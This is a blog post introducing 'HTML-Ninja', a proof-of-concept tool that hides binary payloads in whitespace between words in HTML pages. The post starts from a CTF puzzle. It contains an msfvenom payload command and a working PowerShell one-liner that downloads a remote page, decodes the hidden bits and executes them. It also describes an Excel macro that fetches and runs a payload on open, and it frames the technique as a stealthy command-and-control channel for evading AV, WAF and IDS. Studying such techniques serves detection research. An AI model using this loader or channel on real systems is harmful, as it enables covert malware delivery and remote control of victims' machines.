HTML Whitespace Steganography & Binary Exploit Delivery w/Powershell over HTML [PoC]

Published in

The Startup

9 min readJun 11, 2020

The quieter you become…the quieter you become

Practical Steganography

A few years ago I came across a very academic challenge: it was a ZIP file containing a particular HTML page, the aim was to obtain the usual FLAG.

The web page didn’t have any “juicy clue”, script, image or anything else. The only strange thing was the size (a few MB) and the source was all in one line.

The element that made me suspicious was the content: it was an extract from a Wikipedia page that kept repeating itself many times. So I tried looking for differences between one repetition and another, but I couldn’t find anything at all from a browser and therefore I checked the source directly. From there I discovered that I wasn’t able to find the same occurrences within the page, up to a certain point from which the code began to repeat itself constantly.

Analyzing the differences in the HTML source, the only thing that emerged were double spaces between the words, arranged in an apparently random way.

Even I don’t know how I got there, but looking on the Internet I found some papers of Indian undergraduates (I think they were Indians) that illustrated the theory for implementing “inter-word” white spaces steganography (something like SNOW plus an interesting vector): applying their thesis to my own custom scripts I managed to trace binary files hidden within these duplicate white spaces on the page.

The files were images, which contained other images, compressed files, their passwords and finally the FLAG hidden in a digital audio file. And that was the challenge and the end of it.

The Concept

As you can see, I quoted SNOW (SNOW exploits the Steganographic Nature Of Whitespace).

What SNOW does is to append white spaces (spaces and tabs) at the end of each line of an ASCII file, thus encoding binary data and encrypting them in various ways. The advantage and limitation of this solution is that the amount of data that I can insert into a document is almost unlimited in relation to the number of lines available. The real disadvantage is that any text editor is able to highlight excess suspicious spaces and tabs at the end of the line, just like this information can be lost if the file is processed with parsers.

Steganography of inter-word white spaces, when applied to web pages, lets us insert any kind of binary data between one word and another, in an absolutely invisible way from a browser and hardly recognizable by reading the source: if you don’t know it’s there you will hardly notice it, because an extra space between one tag or word and the other does not make you think anything bad.

The other positive side is that there is no data loss, because both static and dynamic HTML pages are transmitted to the client and their browser is entirely in charge of their interpretation.

Of course we have some limitations: you can enter as much data as the content of the “container” page is long, but this data can be compressed and you don’t necessarily need a lot of capacity if your payload are commands/binary and not information.

How does it work

Long story short: alternating single and double spaces using a sort of Manchester encoding.

So:

one space == 0
two spaces == 1

This is possible because a browser will parse double spaces and always show them as single ones and spaces between tags are invisible to the reader.

The file “pippo.html”:

<b>Pippo</b> (<i>Goofy</i>, in precedenza <i>Dippy Dawg</i> e <i>Dippy the Goof</i><sup id="cite_ref-:0_1-0" class="reference"><a href="#cite_note-:0-1">[1]</a></sup>) è un <a href="/wiki/Personaggio_immaginario" title="Personaggio immaginario">personaggio immaginario</a> dei <a href="/wiki/Cartone_animato" title="Cartone animato">cartoni animati</a> e dei <a href="/wiki/Fumetti" class="mw-redirect" title="Fumetti">fumetti</a> della <a href="/wiki/Disney" class="mw-redirect" title="Disney">Disney</a>, ideato nel 1932 da <a href="/wiki/Pinto_Colvig" title="Pinto Colvig">Pinto Colvig</a> e dall’animatore Johnny Cannon come comprimario di <a href="/wiki/Topolino" title="Topolino">Topolino</a> in un <a href="/wiki/Cortometraggio" title="Cortometraggio">cortometraggio</a>, ma viene caratterizzato definitivamente dall’animatore <a href="/wiki/Art_Babbitt" title="Art Babbitt">Art Babbitt</a> nel 1935<sup id="cite_ref-:0_1-1" class="reference"><a href="#cite_note-:0-1">[1]</a></sup> e successivamente esordisce nei fumetti realizzati da <a href="/wiki/Floyd_Gottfredson" title="Floyd Gottfredson">Floyd Gottfredson</a> che definisce ulteriormente il personaggio dandogli spessore come spalla di Topolino<sup id="cite_ref-:0_1-2" class="reference"><a href="#cite_note-:0-1">[1]</a></sup>. È apparso in centinaia di cartoni animati come protagonista o comprimario<sup id="cite_ref-:2_2-0" class="reference"><a href="#cite_note-:2-2">[2]</a></sup> e in migliaia di albi a fumetti realizzati in vari paesi del mondo<sup id="cite_ref-3" class="reference"><a href="#cite_note-3">[3]</a></sup>.

…is exactly the same (has the same output) as “pipponinja.html”:

<b>Pippo</b> (<i>Goofy</i>,  in  precedenza  <i>Dippy Dawg</i> e <i>Dippy the Goof</i><sup  id="cite_ref-:0_1-0"  class="reference"><a href="#cite_note-:0-1">[1]</a></sup>)  è un <a  href="/wiki/Personaggio_immaginario" title="Personaggio  immaginario">personaggio  immaginario</a>  dei <a href="/wiki/Cartone_animato" title="Cartone animato">cartoni animati</a>  e  dei  <a href="/wiki/Fumetti" class="mw-redirect" title="Fumetti">fumetti</a> della <a  href="/wiki/Disney"  class="mw-redirect" title="Disney">Disney</a>,  ideato  nel  1932  da <a href="/wiki/Pinto_Colvig" title="Pinto Colvig">Pinto  Colvig</a> e  dall’animatore Johnny Cannon come comprimario di <a href="/wiki/Topolino" title="Topolino">Topolino</a> in un <a href="/wiki/Cortometraggio" title="Cortometraggio">cortometraggio</a>, ma viene caratterizzato definitivamente dall’animatore <a href="/wiki/Art_Babbitt" title="Art Babbitt">Art Babbitt</a> nel 1935<sup id="cite_ref-:0_1-1" class="reference"><a href="#cite_note-:0-1">[1]</a></sup> e successivamente esordisce nei fumetti realizzati da <a href="/wiki/Floyd_Gottfredson" title="Floyd Gottfredson">Floyd Gottfredson</a> che definisce ulteriormente il personaggio dandogli spessore come spalla di Topolino<sup id="cite_ref-:0_1-2" class="reference"><a href="#cite_note-:0-1">[1]</a></sup>. È apparso in centinaia di cartoni animati come protagonista o comprimario<sup id="cite_ref-:2_2-0" class="reference"><a href="#cite_note-:2-2">[2]</a></sup> e in migliaia di albi a fumetti realizzati in vari paesi del mondo<sup id="cite_ref-3" class="reference"><a href="#cite_note-3">[3]</a></sup>.

In practice

After banging my head trying to decode that cursed file, I thought of writing a POC to do the reverse operation and try to “weaponize” a possible payload.

Why do I say “weaponize”? Because I challenge any proxy / WAF / AV to analyze and identify every single space, embedded with potentially compressed or password protected payload, within each page sent in clear on a legit HTTP(S) port.

[actually it’s just extremely fun to put an MSF payload into an HTML file and make it “executable”]

This is how HTML-Ninja is born, in the absence of better acronyms.

The tool, raw and incomplete, is a POC written mainly in Python (with Javascript and VBA variants) and allows you to insert, extract and execute payloads within HTML files. Other features have been added in the meantime but it still is a free time project
which has not had much feedback.

Help excerpt:

html-ninja.py -e source content outfile -> will encode the payload file 'content' into file 'source' and output the result as 'outfile'
html-ninja.py -d source outfile -> will try to decrypt white spaces in 'source' file into 'outfile'
html-ninja.py --check filename -> will check 'filename' for available spaces and spaces needed to embed the file
html-ninja.py -d http://localhost/html-ninja.html stdout -> will get http url and output to stdout
html-ninja.py -d http://localhost/html-ninja.html exec -> will get http url and execute the hex payload (payload must have a '|' terminator)
html-ninja.py -ez / -dz ... -> adds zlib compression to both encryption and decryptionhtml-ninja.py -eb / -db ... -> adds bz2 compression to both encryption and decryption

Examples on github include:

html-ninja.js & html-ninja.html

Javascript version and sample HTML showing a “self-decryption” page.

macro_poc.bas & htm

VBA version for automatic execution of payloads via Excel.

buf.txt

Example of a MSF payload:

msfvenom -p linux/x64/exec CMD="whoami;id;uname -a" -f python -o buf.txt

…and a few others…

Demonstration

Let’s take our buf.txt payload and hide it with zlib compression in pippo.html

Now let’s “read” the content of pipporun.html

Binary Exploit Delivery w/Powershell over HTML [PoC]

Static HTML file gets downloaded -> HTML hides binary data -> HTML gets “executed”

Harmless static HTML page with embedded binary payload: https://ephreet.github.io/html-ninja/

Could embed msfvenom meterpreter or any other file, but for the sake of the PoC we are going with the usual “calc.exe”.

Proof of Concept run (payload = “iex calc.exe”):

$CnC = "https://ephreet.github.io/html-ninja/"; $pch = "nil"; $b = ""; $ch = ""
foreach ($cu in (Invoke-WebRequest $CnC -UserAgent "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0").ToString().tocharArray()) {$ch = $cu;if ($pch -eq " "){if ($ch -eq " "){$b = $b + "1"; $ch = "nil"}else{$b = $b + "0";$ch = "nil"}};$pch = $ch}$c = ""
($b -split '(\w{8})' | ? {$_}) | ForEach-Object {$c = $c + [convert]::Tochar([System.Convert]::ToByte($_,2))};$p = $c.Split(" "); & $p[0] $p[1]

Source: https://github.com/ephreet/html-ninja/

SANDBOX [ANY.RUN]

Let’s see what a sandbox sees in relation to the payload inserted in Excel macro.

Used sandbox: any.run

Payload: cmd.exe

The Excel file contains an onload macro that makes the request for the payload via HTTP and executes its content using the algorithm. I expect the abnormal behavior of the script and the download to be detected, but this is a simulation imagining an already running service.

The Excel file is opened and the payload executed, then it works. Obviously the sandbox realizes that something is wrong because the file has contacted a website and a command has been executed.

Analyzing the HTTP request we can only see harmless HTML source:

Which in this example is saved locally even if I am not required to do so, it doesn’t generate big alarms however:

Let’s check on VirusTotal anyway:

These are the suspicious indicators: it is clearly unusual for Excel to make HTTP requests, but no alarm from IPS or IDS:

To be clear, normally there would be some evidence like these, which are precisely the Suricata rules:

Okay, the sandbox notices (of course) and the URL is quite obvious. Even a static analysis of the sample would have allowed us to trace the behavior.

But what if instead of delivering the payload I installed a service? What if it were a browser plugin? In short, if I could avoid the sandbox and the connections were towards http://random.foo/info.htm (invented!) could I rely only on the reputation of a domain?

Conclusions

Okay, it’s a POC. Yes, a payload must still be delivered before it can be executed. And yes, a sandbox will still notice what is being done.

But let’s imagine a more targeted version, perhaps with an offset from which to read the steganographed part in an HTML page, a service running on your PC that makes web requests to absolutely harmless pages that we control.

Wouldn’t that be a Command and Control hidden in plain sight? After the sandbox, would an IPS / IDS be able to intercept it?

Meanwhile, I certainly had a lot of fun opening a reverse shell by “running” an HTML file.